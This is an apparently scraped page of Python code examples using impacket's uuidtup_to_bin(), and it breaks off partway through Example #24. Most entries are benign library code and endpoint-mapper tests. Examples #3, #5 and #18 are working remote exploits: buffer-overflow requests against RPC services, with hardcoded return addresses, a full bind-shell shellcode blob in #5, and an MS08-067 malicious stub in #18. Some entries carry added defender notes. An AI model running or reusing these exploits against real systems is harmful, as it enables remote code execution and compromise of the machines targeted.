Python impacket.uuid.uuidtup_to_bin() Examples
The following are 30
code examples of impacket.uuid.uuidtup_to_bin().
Example #1
Source File: 070415.py From d4rkc0de with GNU General Public License v2.0 | 6 votes |
def DiscoverDNSport(target):
    """Look up, via the RPC endpoint mapper, the TCP port of one interface.

    Opens the ``epmapper`` named pipe over SMB on port 139, binds to
    interface E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0 and pages through
    the endpoint dump until an entry with interface UUID
    50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 appears (the failure message
    below ties that UUID to the DNS service).

    Returns the port as an int. If no entry matches, prints a notice and
    falls off the end, so the caller receives None.

    Defender note: no credentials are configured on the transport in this
    code, so the enumeration only works where the endpoint mapper answers
    such clients. Filtering 139/tcp from untrusted networks and alerting
    on full endpoint dumps requested by unexpected hosts covers it.

    NOTE(review): Python 2 only (print statement); the transport is never
    disconnected. Nesting was reconstructed from a flattened listing.
    """
    trans = transport.SMBTransport(target, 139, 'epmapper')
    trans.connect()
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0')))
    pm = epm.DCERPCEpm(dce)
    # All-zero 20-byte handle; presumably "start from the first entry".
    handle = '\x00'*20
    while 1:
        dump = pm.portmap_dump(handle)
        # An empty reply ends the walk.
        if not dump.get_entries_num():
            break
        # The returned handle is fed back in to fetch the next entry.
        handle = dump.get_handle()
        entry = dump.get_entry().get_entry()
        if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'):
            # Takes the text between '[' and the final character of the
            # string binding; raises if the binding has no '[' or the
            # bracketed part is not numeric.
            port = entry.get_string_binding().split('[')[1][:-1]
            return int(port)
    print '[-] Could not locate DNS port; Target might not be running DNS'
Example #2
Source File: 070105.py From d4rkc0de with GNU General Public License v2.0 | 6 votes |
def EnableDetailLogging(target): trans = transport.TCPTransport(target, 6502) #On some linux systems the following call to connect may fail due to #no support of settimeout in socket module. Comment out that line in #transport.py of impacket and run this script try: trans.connect() except: print 'Could not connect to target port; Target may not be running tapeeng' sys.exit(-1) dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0'))) #RPC request to enable detail logging request = '\x00\x04\x08\x0c' request += '\x02\x00\x00\x00' request += '\x00\x00\x00\x00' request += '\x00\x00\x00\x00' request += '\x00\x00\x00\x00' dce.call(43, request)
Example #3
Source File: 070316.py From d4rkc0de with GNU General Public License v2.0 | 6 votes |
def DCEconnectAndExploit(target):
    """Proof-of-concept overflow request against the RPC service on TCP 6503.

    Binds to interface dc246bf0-7a7a-11ce-9f88-00805fe43838 v1.0 and sends
    a single call to opnum 45. ``shellcode`` is a module-level name that is
    not part of this excerpt.

    Defender note: the bind and the call carry no authentication in this
    code, so reachability of 6503/tcp is the only precondition visible
    here. On the wire the request stands out by size alone: the stub built
    below is roughly 500 KB for one call. Keeping the service patched and
    restricting the port to the hosts that need it are the mitigations;
    an oversized opnum-45 request to this interface is the detection cue.
    """
    trans = transport.TCPTransport(target, 6503)
    trans.connect()
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))
    # The following DWORD gets converted to an address pointing into our
    # buffer.
    request = struct.pack('<L', 0x00003A7C)
    request += "A" * 19608
    request += "\x90\x90\xeb\x06"
    # At the point of overflow EBX points to our shellcode
    # Address of 'call ebx' from kernel32.dll SP4
    request += struct.pack('<L', 0x7C577B03)
    request += "\x90\x90\x90\x90"
    request += shellcode
    request += "b" * 480000
    dce.call(45, request)
Example #4
Source File: test_epm.py From Slackor with GNU General Public License v3.0 | 5 votes |
def rtesthept_map(self):
    """Resolve three well-known interfaces through the endpoint mapper.

    Calls ``epm.hept_map`` against ``self.machine`` for SAMR (default
    protocol and ``ncacn_ip_tcp``), ATSVC (default protocol) and SCMR
    (``ncacn_ip_tcp``). There are no assertions: the method passes as long
    as no call raises.
    """
    tcp_only = {'protocol': 'ncacn_ip_tcp'}
    # (interface UUID, version) -> keyword arguments of each lookup, in order.
    lookups = (
        (('12345778-1234-ABCD-EF00-0123456789AC', '1.0'), ({}, tcp_only)),  # SAMR
        (('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'), ({},)),           # ATSVC
        (('367ABB81-9844-35F1-AD32-98F038001003', '2.0'), (tcp_only,)),     # SCMR
    )
    for iface, variants in lookups:
        iface_bin = uuidtup_to_bin(iface)
        for extra in variants:
            epm.hept_map(self.machine, iface_bin, **extra)
Example #5
Source File: 070105.py From d4rkc0de with GNU General Public License v2.0 | 5 votes |
def DCEconnectAndExploit(target): trans = transport.TCPTransport(target, 6502) trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0'))) request = '\x10\x09\xf9\x77' request += '\x41'*1130 request += '\x90\x90\x90\x90\xeb\x08' #short jump into nops request += '\xd2\x7b\x57\x7c' #call ebx address from kernel32.dll request += '\x90' * 32 #Shellcode to bind shell to TCP port 3334 request += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" request += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83" request += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2" request += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87" request += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98" request += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91" request += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75" request += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45" request += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57" request += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc" request += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0" request += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7" request += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a" request += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4" request += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4" request += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87" request += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f" request += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3" request += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68" request += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65" request += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e" request += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63" request += 
"\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e" request += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91" request += "\xba\xa6\xf5\x31\x39\x59\x23\xce" dce.call(38, request)
Example #6
Source File: opdump.py From Slackor with GNU General Public License v3.0 | 5 votes |
def main(args):
    """Probe every operation number (0-255) of one RPC interface.

    ``args`` must be ``[hostname, port, interface, version]``; otherwise a
    usage line is printed and 1 is returned. For each opnum a fresh
    connection is made, the interface is bound, an empty request is sent
    and the outcome ("success" or the exception text) is recorded. The
    trailing run of identical outcomes is collapsed into one summary line.

    Note for operators: this opens 256 connections and issues 256 calls
    against the target without configuring credentials, which is noisy and
    easy to spot in RPC or firewall logs.
    """
    if len(args) != 4:
        print("usage: opdump.py hostname port interface version")
        return 1

    host, port, interface, version = args[0], int(args[1]), args[2], args[3]

    trans = transport.DCERPCTransportFactory("ncacn_ip_tcp:%s" % host)
    trans.set_dport(port)

    results = []
    for opnum in range(256):
        dce = trans.get_dce_rpc()
        dce.connect()
        dce.bind(uuid.uuidtup_to_bin((interface, version)))
        dce.call(opnum, "")
        try:
            dce.recv()
        except Exception as e:
            outcome = str(e)
        else:
            outcome = "success"
        dce.disconnect()
        results.append(outcome)

    # Drop the repeated tail so that it is reported once, as a range.
    suffix = results[-1]
    while results and results[-1] == suffix:
        results.pop()

    for opnum, outcome in enumerate(results):
        print("op %d (0x%02x): %s" % (opnum, opnum, outcome))

    print("ops %d-%d: %s" % (len(results), 255, suffix))
Example #7
Source File: rpcrt.py From Slackor with GNU General Public License v3.0 | 5 votes |
def __init__(self, transport):
    """Set up a DCE/RPC v5 session object on top of ``transport``.

    The session starts at ``RPC_C_AUTHN_LEVEL_NONE`` with
    ``RPC_C_AUTHN_WINNT`` as the authentication type and no credentials.
    Callers that need an authenticated, signed or sealed channel have to
    change these before binding.

    Credential material (password, LM/NT hashes, AES key, TGT/TGS, session
    and sealing keys) is held in plain instance attributes, so instances
    should not be logged or serialised.
    """
    DCERPC.__init__(self, transport)

    # Authentication defaults.
    self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
    self.__auth_type = RPC_C_AUTHN_WINNT
    self.__auth_type_callback = None
    # Flags of the authenticated session; needed for the whole connection.
    self.__auth_flags = 0

    # Credentials: nothing is known yet.
    self.__username = self.__password = None
    self.__domain = self.__lmhash = self.__nthash = self.__aesKey = ''
    self.__TGT = self.__TGS = None

    # Signing and sealing state, filled in once authentication completes.
    self.__clientSigningKey = self.__serverSigningKey = b''
    self.__clientSealingKey = self.__serverSealingKey = b''
    self.__clientSealingHandle = self.__serverSealingHandle = b''
    self.__sessionKey = None
    self.__cipher = None
    self.__confounder = b''
    self.__gss = None
    self.__sequence = 0

    # Protocol bookkeeping.
    self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
    self.__callid = 1
    self._ctx = 0
    self.__max_xmit_size = 0
    self.__flags = 0
Example #8
Source File: rpcrt.py From Slackor with GNU General Public License v3.0 | 5 votes |
def addCallbacks(self, ifaceUUID, secondaryAddr, callbacks):
    """
    Register the callbacks that serve one interface.

    Any registration already stored for the same interface is replaced
    without warning.

    :param uuid ifaceUUID: the interface UUID, as a (uuid, version) tuple
    :param string secondaryAddr: the secondary address to answer as part of the bind request (e.g. \\\\PIPE\\\\srvsvc)
    :param dict callbacks: the callbacks for each opnum. Format is [opnum] = callback
    """
    iface_key = uuidtup_to_bin(ifaceUUID)
    self._listenUUIDS[iface_key] = {
        'SecondaryAddr': secondaryAddr,
        'CallBacks': callbacks,
    }
    # ifaceUUID must be a 2-tuple here: it fills both %s placeholders.
    self.log("Callback added for UUID %s V:%s" % ifaceUUID)
Example #9
Source File: ndr.py From Slackor with GNU General Public License v3.0 | 5 votes |
def changeTransferSyntax(self, newSyntax):
    """Switch this NDR object, and its nested NDR fields, to the NDR64 layout.

    Acts only when ``newSyntax`` equals the binary form of
    71710533-BEBA-4937-8319-B5DBEF9CCC36 v1.0 and the object is not NDR64
    yet. For any other syntax nothing happens, unless the object is
    already NDR64, in which case an Exception is raised.

    NOTE(review): the nesting below was reconstructed from a flattened
    listing; confirm the placement of the final ``else`` against the
    upstream ndr.py.
    """
    NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
    if newSyntax == NDR64Syntax:
        if self._isNDR64 is False:
            # Ok, let's change everything
            self._isNDR64 = True
            # Recurse first so that children are converted before this object.
            for fieldName in list(self.fields.keys()):
                if isinstance(self.fields[fieldName], NDR):
                    self.fields[fieldName].changeTransferSyntax(newSyntax)
            # Finally, I change myself: the *64 variants replace the
            # defaults only when they are defined (non-empty / present).
            if self.commonHdr64 != ():
                self.commonHdr = self.commonHdr64
            if self.structure64 != ():
                self.structure = self.structure64
            if hasattr(self, 'align64'):
                self.align = self.align64
            # And check whether the changes changed the data types
            # if so, I need to instantiate the new ones and copy the
            # old values
            for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
                if isinstance(self.fields[fieldName], NDR):
                    if fieldTypeOrClass != self.fields[fieldName].__class__ and isinstance(self.fields[fieldName], NDRPOINTERNULL) is False:
                        # Keep the old value, rebuild the field with the
                        # new type, then put the value back.
                        backupData = self[fieldName]
                        self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64)
                        if 'Data' in self.fields[fieldName].fields:
                            self.fields[fieldName].fields['Data'] = backupData
                        else:
                            self[fieldName] = backupData
    else:
        if self._isNDR64 is True:
            # Ok, nothing for now: going back from NDR64 is not supported.
            raise Exception('Shouldn\'t be here')
Example #10
Source File: ndr.py From PiBunny with MIT License | 5 votes |
def changeTransferSyntax(self, newSyntax):
    """Switch this NDR object, and its nested NDR fields, to the NDR64 layout.

    Acts only when ``newSyntax`` equals the binary form of
    71710533-BEBA-4937-8319-B5DBEF9CCC36 v1.0 and the object is not NDR64
    yet. For any other syntax nothing happens, unless the object is
    already NDR64 (see the note on the last line).

    NOTE(review): Python 2 only (``has_key``). The nesting below was
    reconstructed from a flattened listing; confirm the placement of the
    final ``else`` against the upstream ndr.py.
    """
    NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
    if newSyntax == NDR64Syntax:
        if self._isNDR64 is False:
            # Ok, let's change everything
            self._isNDR64 = True
            # Recurse first so that children are converted before this object.
            for fieldName in self.fields.keys():
                if isinstance(self.fields[fieldName], NDR):
                    self.fields[fieldName].changeTransferSyntax(newSyntax)
            # Finally, I change myself: the *64 variants replace the
            # defaults only when they are defined (non-empty / present).
            if self.commonHdr64 != ():
                self.commonHdr = self.commonHdr64
            if self.structure64 != ():
                self.structure = self.structure64
            if hasattr(self, 'align64'):
                self.align = self.align64
            # And check whether the changes changed the data types
            # if so, I need to instantiate the new ones and copy the
            # old values
            for fieldName, fieldTypeOrClass in self.commonHdr+self.structure+self.referent:
                if isinstance(self.fields[fieldName], NDR):
                    if fieldTypeOrClass != self.fields[fieldName].__class__ and isinstance(self.fields[fieldName], NDRPOINTERNULL) is False:
                        # Keep the old value, rebuild the field with the
                        # new type, then put the value back.
                        backupData = self[fieldName]
                        self.fields[fieldName] = fieldTypeOrClass(isNDR64 = self._isNDR64)
                        if self.fields[fieldName].fields.has_key('Data'):
                            self.fields[fieldName].fields['Data'] = backupData
                        else:
                            self[fieldName] = backupData
    else:
        if self._isNDR64 is True:
            # Ok, nothing for now
            # NOTE(review): a bare ``raise`` with no exception being
            # handled fails with an unrelated error; an explicit exception
            # with a message would state the intent.
            raise
Example #11
Source File: test_epm.py From Slackor with GNU General Public License v3.0 | 5 votes |
def test_hlookup(self):
    """Query the endpoint mapper of ``self.machine``, unfiltered and by interface.

    One lookup without a filter, then one ``RPC_C_EP_MATCH_BY_IF`` lookup
    each for SAMR, ATSVC and SCMR. There are no assertions: the test
    passes as long as no call raises.
    """
    epm.hept_lookup(self.machine)

    interfaces = (
        ('12345778-1234-ABCD-EF00-0123456789AC', '1.0'),  # SAMR
        ('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'),  # ATSVC
        ('367ABB81-9844-35F1-AD32-98F038001003', '2.0'),  # SCMR
    )
    for iface in interfaces:
        if_id = uuidtup_to_bin(iface)
        epm.hept_lookup(self.machine, inquiry_type=epm.RPC_C_EP_MATCH_BY_IF, ifId=if_id)
Example #12
Source File: opdump.py From PiBunny with MIT License | 5 votes |
def main(args):
    """Probe every operation number (0-255) of one RPC interface.

    ``args`` must be ``[hostname, port, interface, version]``; otherwise a
    usage line is printed and 1 is returned. For each opnum a fresh
    connection is made, the interface is bound, an empty request is sent
    and the outcome ("success" or the exception text) is appended to
    ``results``.

    NOTE(review): this listing stops at the comment on its last line; the
    code that trims and prints ``results`` is not shown, so as printed the
    function collects outcomes and discards them. Python 2 only (print
    statement, ``except Exception, e``).
    """
    if len(args) != 4:
        print "usage: opdump.py hostname port interface version"
        return 1
    host, port, interface, version = args[0], int(args[1]), args[2], args[3]
    stringbinding = "ncacn_ip_tcp:%s" % host
    trans = transport.DCERPCTransportFactory(stringbinding)
    trans.set_dport(port)
    results = []
    # One connection per opnum: 256 connects and binds against the target,
    # with no credentials configured.
    for i in range(256):
        dce = trans.get_dce_rpc()
        dce.connect()
        iid = uuid.uuidtup_to_bin((interface, version))
        dce.bind(iid)
        dce.call(i, "")
        # Only the reply is guarded; a failing connect, bind or call
        # aborts the whole run.
        try:
            dce.recv()
        except Exception, e:
            result = str(e)
        else:
            result = "success"
        dce.disconnect()
        results.append(result)
    # trim duplicate suffixes from the back
Example #13
Source File: test_dcomrt.py From PiBunny with MIT License | 5 votes |
def test_RemoteGetClassObject(self):
    """Fetch a class object for ``comev.CLSID_EventSystem`` and release it.

    Requests the interface 00000001-0000-0000-C000-000000000046 v0.0
    (named IID_IClassFactory in the original test) through
    ``IRemoteSCMActivator``. There are no assertions: the test passes as
    long as no call raises.
    """
    dce, _ = self.connect()
    class_factory_iid = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046', '0.0'))
    activator = dcomrt.IRemoteSCMActivator(dce)
    class_object = activator.RemoteGetClassObject(comev.CLSID_EventSystem, class_factory_iid)
    class_object.RemRelease()
Example #14
Source File: test_epm.py From PiBunny with MIT License | 5 votes |
def test_hept_map(self):
    """Resolve three well-known interfaces through the endpoint mapper.

    Calls ``epm.hept_map`` against ``self.machine`` for SAMR (default
    protocol and ``ncacn_ip_tcp``), ATSVC (default protocol) and SCMR
    (``ncacn_ip_tcp``). The responses are not inspected: the test passes
    as long as no call raises.
    """
    tcp_only = {'protocol': 'ncacn_ip_tcp'}
    # (interface UUID, version) -> keyword arguments of each lookup, in order.
    lookups = (
        (('12345778-1234-ABCD-EF00-0123456789AC', '1.0'), ({}, tcp_only)),  # SAMR
        (('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'), ({},)),           # ATSVC
        (('367ABB81-9844-35F1-AD32-98F038001003', '2.0'), (tcp_only,)),     # SCMR
    )
    for iface, variants in lookups:
        iface_bin = uuidtup_to_bin(iface)
        for extra in variants:
            epm.hept_map(self.machine, iface_bin, **extra)
Example #15
Source File: test_epm.py From PiBunny with MIT License | 5 votes |
def test_hlookup(self):
    """Query the endpoint mapper of ``self.machine``, unfiltered and by interface.

    One lookup without a filter, then one ``RPC_C_EP_MATCH_BY_IF`` lookup
    each for SAMR, ATSVC and SCMR. The responses are not inspected: the
    test passes as long as no call raises.
    """
    epm.hept_lookup(self.machine)

    interfaces = (
        ('12345778-1234-ABCD-EF00-0123456789AC', '1.0'),  # SAMR
        ('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'),  # ATSVC
        ('367ABB81-9844-35F1-AD32-98F038001003', '2.0'),  # SCMR
    )
    for iface in interfaces:
        if_id = uuidtup_to_bin(iface)
        epm.hept_lookup(self.machine, inquiry_type=epm.RPC_C_EP_MATCH_BY_IF, ifId=if_id)
Example #16
Source File: rpcrt.py From PiBunny with MIT License | 5 votes |
def __init__(self, transport):
    """Set up a DCE/RPC v5 session object on top of ``transport``.

    The session starts at ``RPC_C_AUTHN_LEVEL_NONE`` with
    ``RPC_C_AUTHN_WINNT`` as the authentication type and no credentials.
    Callers that need an authenticated, signed or sealed channel have to
    change these before binding.

    Credential material (password, LM/NT hashes, AES key, TGT/TGS, session
    and sealing keys) is held in plain instance attributes, so instances
    should not be logged or serialised.
    """
    DCERPC.__init__(self, transport)

    # Authentication defaults.
    self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
    self.__auth_type = RPC_C_AUTHN_WINNT
    self.__auth_type_callback = None
    # Flags of the authenticated session; needed for the whole connection.
    self.__auth_flags = 0

    # Credentials: nothing is known yet.
    self.__username = self.__password = None
    self.__domain = self.__lmhash = self.__nthash = self.__aesKey = ''
    self.__TGT = self.__TGS = None

    # Signing and sealing state, filled in once authentication completes.
    self.__clientSigningKey = self.__serverSigningKey = ''
    self.__clientSealingKey = self.__serverSealingKey = ''
    self.__clientSealingHandle = self.__serverSealingHandle = ''
    self.__sessionKey = None
    self.__cipher = None
    self.__confounder = ''
    self.__gss = None
    self.__sequence = 0

    # Protocol bookkeeping.
    self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
    self.__callid = 1
    self._ctx = 0
    self.__max_xmit_size = 0
    self.__flags = 0
Example #17
Source File: ms08-067_check.py From sparta with GNU General Public License v3.0 | 5 votes |
def __bind(self):
    '''
    Bind a new DCERPC session to the SRVSVC (Server Service) interface.

    The session object is stored on the instance before the bind is
    attempted. A socket error during either step is reported as
    connectionException; any other exception propagates unchanged.

    Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html
    '''
    srvsvc_iface = ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')
    try:
        session = self.__trans.DCERPC_class(self.__trans)
        self.__dce = session
        session.bind(uuid.uuidtup_to_bin(srvsvc_iface))
    except socket.error:
        raise connectionException('unable to bind to SRVSVC endpoint')
Example #18
Source File: ms08-067_exploit_7132.py From WHP with Do What The F*ck You Want To Public License | 5 votes |
def __DCEPacket(self):
    """Connect to the browser named pipe of ``self.target`` and build the request stub.

    Opens an ``ncacn_np`` transport to the browser pipe, binds to
    interface 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 and assembles
    ``self.__stub``. Nothing is sent to the bound interface in this
    method. ``shellcode`` and ``payload`` are names defined elsewhere in
    the file and not part of this excerpt.

    Defender note: going by the file name this belongs to an MS08-067
    proof of concept. No credentials are configured before the pipe is
    opened. Applying the MS08-067 update and keeping SMB (139/445) closed
    to untrusted networks are the mitigations; a bind to this interface
    over the browser pipe from an unexpected host is the detection cue.

    NOTE(review): Python 2 only (print statement).
    """
    print '[-]Initiating connection'
    self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
    self.__trans.connect()
    print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
    self.__dce = self.__trans.DCERPC_class(self.__trans)
    self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
    # Constructing Malicious Packet
    self.__stub='\x01\x00\x00\x00'
    self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
    self.__stub+=shellcode
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
    self.__stub+='\x00\x00\x00\x00'
    self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
    self.__stub+=payload
    self.__stub+='\x00\x00\x00\x00'
    self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
    self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
    self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
    self.__stub+='\x01\x00\x00\x00'
    return
Example #19
Source File: test_dcomrt.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
def test_RemoteGetClassObject(self):
    """Fetch a class object for ``comev.CLSID_EventSystem`` and release it.

    Requests the interface 00000001-0000-0000-C000-000000000046 v0.0
    (named IID_IClassFactory in the original test) through
    ``IRemoteSCMActivator``. There are no assertions: the test passes as
    long as no call raises.
    """
    dce, _ = self.connect()
    class_factory_iid = uuidtup_to_bin(('00000001-0000-0000-C000-000000000046', '0.0'))
    activator = dcomrt.IRemoteSCMActivator(dce)
    class_object = activator.RemoteGetClassObject(comev.CLSID_EventSystem, class_factory_iid)
    class_object.RemRelease()
Example #20
Source File: test_epm.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
def test_hept_map(self):
    """Resolve three well-known interfaces through the endpoint mapper.

    Calls ``epm.hept_map`` against ``self.machine`` for SAMR (default
    protocol and ``ncacn_ip_tcp``), ATSVC (default protocol) and SCMR
    (``ncacn_ip_tcp``). The responses are not inspected: the test passes
    as long as no call raises.
    """
    tcp_only = {'protocol': 'ncacn_ip_tcp'}
    # (interface UUID, version) -> keyword arguments of each lookup, in order.
    lookups = (
        (('12345778-1234-ABCD-EF00-0123456789AC', '1.0'), ({}, tcp_only)),  # SAMR
        (('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'), ({},)),           # ATSVC
        (('367ABB81-9844-35F1-AD32-98F038001003', '2.0'), (tcp_only,)),     # SCMR
    )
    for iface, variants in lookups:
        iface_bin = uuidtup_to_bin(iface)
        for extra in variants:
            epm.hept_map(self.machine, iface_bin, **extra)
Example #21
Source File: test_epm.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
def test_hlookup(self):
    """Query the endpoint mapper of ``self.machine``, unfiltered and by interface.

    One lookup without a filter, then one ``RPC_C_EP_MATCH_BY_IF`` lookup
    each for SAMR, ATSVC and SCMR. The responses are not inspected: the
    test passes as long as no call raises.
    """
    epm.hept_lookup(self.machine)

    interfaces = (
        ('12345778-1234-ABCD-EF00-0123456789AC', '1.0'),  # SAMR
        ('1FF70682-0A51-30E8-076D-740BE8CEE98B', '1.0'),  # ATSVC
        ('367ABB81-9844-35F1-AD32-98F038001003', '2.0'),  # SCMR
    )
    for iface in interfaces:
        if_id = uuidtup_to_bin(iface)
        epm.hept_lookup(self.machine, inquiry_type=epm.RPC_C_EP_MATCH_BY_IF, ifId=if_id)
Example #22
Source File: rpcrt.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
def __init__(self, transport):
    """Set up a DCE/RPC v5 session object on top of ``transport``.

    The session starts at ``RPC_C_AUTHN_LEVEL_NONE`` with
    ``RPC_C_AUTHN_WINNT`` as the authentication type and no credentials.
    Callers that need an authenticated, signed or sealed channel have to
    change these before binding.

    Credential material (password, LM/NT hashes, AES key, TGT/TGS, session
    and sealing keys) is held in plain instance attributes, so instances
    should not be logged or serialised.
    """
    DCERPC.__init__(self, transport)

    # Authentication defaults.
    self.__auth_level = RPC_C_AUTHN_LEVEL_NONE
    self.__auth_type = RPC_C_AUTHN_WINNT
    self.__auth_type_callback = None
    # Flags of the authenticated session; needed for the whole connection.
    self.__auth_flags = 0

    # Credentials: nothing is known yet.
    self.__username = self.__password = None
    self.__domain = self.__lmhash = self.__nthash = self.__aesKey = ''
    self.__TGT = self.__TGS = None

    # Signing and sealing state, filled in once authentication completes.
    self.__clientSigningKey = self.__serverSigningKey = ''
    self.__clientSealingKey = self.__serverSealingKey = ''
    self.__clientSealingHandle = self.__serverSealingHandle = ''
    self.__sessionKey = None
    self.__cipher = None
    self.__confounder = ''
    self.__gss = None
    self.__sequence = 0

    # Protocol bookkeeping.
    self.transfer_syntax = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
    self.__callid = 1
    self._ctx = 0
    self.__max_xmit_size = 0
    self.__flags = 0
Example #23
Source File: rpcrt.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
def addCallbacks(self, ifaceUUID, secondaryAddr, callbacks):
    """
    Register the callbacks that serve one interface.

    Any registration already stored for the same interface is replaced
    without warning.

    :param uuid ifaceUUID: the interface UUID, as a (uuid, version) tuple
    :param string secondaryAddr: the secondary address to answer as part of the bind request (e.g. \\\\PIPE\\\\srvsvc)
    :param dict callbacks: the callbacks for each opnum. Format is [opnum] = callback
    """
    iface_key = uuidtup_to_bin(ifaceUUID)
    self._listenUUIDS[iface_key] = {
        'SecondaryAddr': secondaryAddr,
        'CallBacks': callbacks,
    }
    # ifaceUUID must be a 2-tuple here: it fills both %s placeholders.
    self.log("Callback added for UUID %s V:%s" % ifaceUUID)
Example #24
Source File: ndr.py From CVE-2017-7494 with GNU General Public License v3.0 | 5 votes |
def changeTransferSyntax(self, newSyntax):
    """Switch this NDR object, and its nested NDR fields, to the NDR64 layout.

    Acts only when ``newSyntax`` equals the binary form of
    71710533-BEBA-4937-8319-B5DBEF9CCC36 v1.0 and the object is not NDR64
    yet. For any other syntax nothing happens, unless the object is
    already NDR64 (see the note on the last line).

    NOTE(review): Python 2 only (``has_key``). The nesting below was
    reconstructed from a flattened listing; confirm the placement of the
    final ``else`` against the upstream ndr.py.
    """
    NDR64Syntax = uuidtup_to_bin(('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
    if newSyntax == NDR64Syntax:
        if self._isNDR64 is False:
            # Ok, let's change everything
            self._isNDR64 = True
            # Recurse first so that children are converted before this object.
            for fieldName in self.fields.keys():
                if isinstance(self.fields[fieldName], NDR):
                    self.fields[fieldName].changeTransferSyntax(newSyntax)
            # Finally, I change myself: the *64 variants replace the
            # defaults only when they are defined (non-empty / present).
            if self.commonHdr64 != ():
                self.commonHdr = self.commonHdr64
